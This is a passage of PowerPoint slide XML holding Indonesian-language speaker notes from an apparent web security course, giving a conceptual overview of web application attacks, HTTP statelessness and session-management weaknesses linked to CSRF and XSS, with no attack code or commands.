              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketinggalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zaman </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mirip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>eksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbedaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jelas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Tidak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menavigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-server, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melewati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dieksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mana pun di Internet, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penjahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertahankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprediksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fiksasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembajakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemalsuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs (CSRF) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs (XSS). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Serangan-serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeksploitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melekat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skrip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berasal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Nb. CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dibahas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>mendalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> di Pelajaran 13.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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180</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358257975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Skrip Lintas Situs (XSS)</a:t>
